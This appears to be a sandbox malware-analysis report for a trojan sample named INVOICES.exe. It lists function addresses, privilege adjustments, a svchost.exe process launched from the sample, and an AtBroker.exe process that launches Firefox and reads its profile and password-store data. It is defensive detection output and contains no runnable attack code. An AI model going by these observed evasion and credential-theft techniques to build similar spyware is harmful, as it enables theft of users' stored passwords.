                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00766F360_2_00766F36
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007470FE0_2_007470FE
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007431900_2_00743190
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007312870_2_00731287
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0075F3590_2_0075F359
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007533070_2_00753307
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007516040_2_00751604
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007456800_2_00745680
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007578130_2_00757813
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007458C00_2_007458C0
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00751AF80_2_00751AF8
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00769C350_2_00769C35
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0073FE400_2_0073FE40
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007B7E0D0_2_007B7E0D
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0075BF260_2_0075BF26
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00751F100_2_00751F10
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_009435F00_2_009435F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004186432_2_00418643
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041687E2_2_0041687E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168832_2_00416883
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101632_2_00410163
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1E32_2_0040E1E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029F72_2_004029F7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040224D2_2_0040224D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022502_2_00402250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402A002_2_00402A00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004042252_2_00404225
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EBC32_2_0042EBC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E802_2_00402E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF432_2_0040FF43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF3A2_2_0040FF3A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA3522_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F02_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037003E62_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E02742_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C02C02_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C81582_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036301002_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA1182_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F81CC2_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F41A22_2_036F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037001AA2_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D20002_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036407702_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036647502_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C02_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C6E02_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036405352_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037005912_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F24462_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E44202_2_036E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EE4F62_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB402_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F6BD72_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA802_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036569622_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A02_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370A9A62_2_0370A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364A8402_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036428402_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E8F02_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036268B82_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4F402_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03682F282_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660F302_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E2F302_2_036E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364CFE02_2_0364CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632FC82_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BEFA02_2_036BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640E592_2_03640E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEE262_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEEDB2_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652E902_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FCE932_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364AD002_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DCD1F2_2_036DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363ADE02_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03658DBF2_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640C002_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630CF22_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0CB52_2_036E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D34C2_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F132D2_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368739A2_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E12ED2_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B2C02_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036452A02_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367516C2_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F1722_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B16B2_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364B1B02_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F70E92_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF0E02_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF0CC2_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036470C02_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF7B02_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036856302_2_03685630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F16CC2_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F75712_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037095C32_2_037095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD5B02_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036314602_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF43F2_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFB762_2_036FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B5BF02_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367DBF92_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FB802_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B3A6C2_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFA492_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7A462_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EDAC62_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DDAAC2_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03685AA02_2_03685AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E1AA32_2_036E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036499502_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B9502_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D59102_2_036D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AD8002_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036438E02_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFF092_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD22_2_03603FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD52_2_03603FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFFB12_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03641F922_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03649EB02_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7D732_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643D402_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F1D5A2_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FDC02_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B9C322_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFCF22_2_036FFCF2
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047E24465_2_047E2446
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047D44205_2_047D4420
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047DE4F65_2_047DE4F6
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047305355_2_04730535
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047F05915_2_047F0591
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0474C6E05_2_0474C6E0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047307705_2_04730770
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047547505_2_04754750
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0472C7C05_2_0472C7C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047C20005_2_047C2000
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047B81585_2_047B8158
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047CA1185_2_047CA118
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047201005_2_04720100
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047E81CC5_2_047E81CC
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047F01AA5_2_047F01AA
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047D02745_2_047D0274
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047B02C05_2_047B02C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047EA3525_2_047EA352
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0473E3F05_2_0473E3F0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047F03E65_2_047F03E6
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04730C005_2_04730C00
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04720CF25_2_04720CF2
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047D0CB55_2_047D0CB5
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047CCD1F5_2_047CCD1F
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0473AD005_2_0473AD00
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0472ADE05_2_0472ADE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04748DBF5_2_04748DBF
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04730E595_2_04730E59
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047EEE265_2_047EEE26
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047EEEDB5_2_047EEEDB
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04742E905_2_04742E90
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047ECE935_2_047ECE93
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047A4F405_2_047A4F40
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04750F305_2_04750F30
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047D2F305_2_047D2F30
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04772F285_2_04772F28
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0473CFE05_2_0473CFE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04722FC85_2_04722FC8
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047AEFA05_2_047AEFA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0473A8405_2_0473A840
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047328405_2_04732840
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0475E8F05_2_0475E8F0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047168B85_2_047168B8
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047469625_2_04746962
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047329A05_2_047329A0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047FA9A65_2_047FA9A6
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0472EA805_2_0472EA80
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047EAB405_2_047EAB40
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047E6BD75_2_047E6BD7
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047214605_2_04721460
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047EF43F5_2_047EF43F
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047E75715_2_047E7571
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047CD5B05_2_047CD5B0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047E16CC5_2_047E16CC
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047EF7B05_2_047EF7B0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047E70E95_2_047E70E9
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047EF0E05_2_047EF0E0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047DF0CC5_2_047DF0CC
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047370C05_2_047370C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0471F1725_2_0471F172
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047FB16B5_2_047FB16B
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0476516C5_2_0476516C
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0473B1B05_2_0473B1B0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047D12ED5_2_047D12ED
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0474B2C05_2_0474B2C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047352A05_2_047352A0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0471D34C5_2_0471D34C
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047E132D5_2_047E132D
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0477739A5_2_0477739A
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047A9C325_2_047A9C32
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047EFCF25_2_047EFCF2
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047E7D735_2_047E7D73
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047E1D5A5_2_047E1D5A
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04733D405_2_04733D40
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0474FDC05_2_0474FDC0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04739EB05_2_04739EB0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047EFF095_2_047EFF09
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047EFFB15_2_047EFFB1
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04731F925_2_04731F92
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0479D8005_2_0479D800
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047338E05_2_047338E0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047399505_2_04739950
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0474B9505_2_0474B950
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047C59105_2_047C5910
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047A3A6C5_2_047A3A6C
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047EFA495_2_047EFA49
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047E7A465_2_047E7A46
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047DDAC65_2_047DDAC6
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047CDAAC5_2_047CDAAC
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04775AA05_2_04775AA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047D1AA35_2_047D1AA3
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047EFB765_2_047EFB76
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047A5BF05_2_047A5BF0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0476DBF95_2_0476DBF9
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0474FB805_2_0474FB80
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_00351F005_2_00351F00
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0034CE375_2_0034CE37
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0034CE405_2_0034CE40
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0034D0605_2_0034D060
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0034B0E05_2_0034B0E0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_003411225_2_00341122
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_003555405_2_00355540
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0035377B5_2_0035377B
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_003537805_2_00353780
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0036BAC05_2_0036BAC0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_044454355_2_04445435
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0443E64C5_2_0443E64C
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0443D7185_2_0443D718
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0443E1945_2_0443E194
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0443E2B35_2_0443E2B3
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0443C9445_2_0443C944
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0444593D5_2_0444593D
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0443C9D85_2_0443C9D8
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04777E54 appears 102 times
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 047AF290 appears 105 times
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 0471B970 appears 280 times
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04765130 appears 58 times
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 0479EA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 111 times
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: String function: 00737F41 appears 35 times
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: String function: 00750C63 appears 70 times
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: String function: 00758A80 appears 42 times
                Source: INVOICES.exe, 00000000.00000003.1420002445.0000000003B4D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INVOICES.exe
                Source: INVOICES.exe, 00000000.00000003.1410165013.00000000039A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INVOICES.exe
                Source: INVOICES.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@15/13
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079A0F4 GetLastError,FormatMessageW,0_2_0079A0F4
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007884F3 AdjustTokenPrivileges,CloseHandle,0_2_007884F3
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00788AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00788AA3
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079B3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0079B3BF
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007AEF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_007AEF21
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079C423 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0079C423
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00734FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00734FE9
                Source: C:\Users\user\Desktop\INVOICES.exeFile created: C:\Users\user\AppData\Local\Temp\aut9E9.tmpJump to behavior
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: AtBroker.exe, 00000005.00000002.3876263575.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3876263575.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1879474595.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3876263575.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1879309425.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: INVOICES.exeReversingLabs: Detection: 47%
                Source: unknownProcess created: C:\Users\user\Desktop\INVOICES.exe "C:\Users\user\Desktop\INVOICES.exe"
                Source: C:\Users\user\Desktop\INVOICES.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INVOICES.exe"
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\INVOICES.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INVOICES.exe"Jump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: kernel.appcore.dllJump to behavior
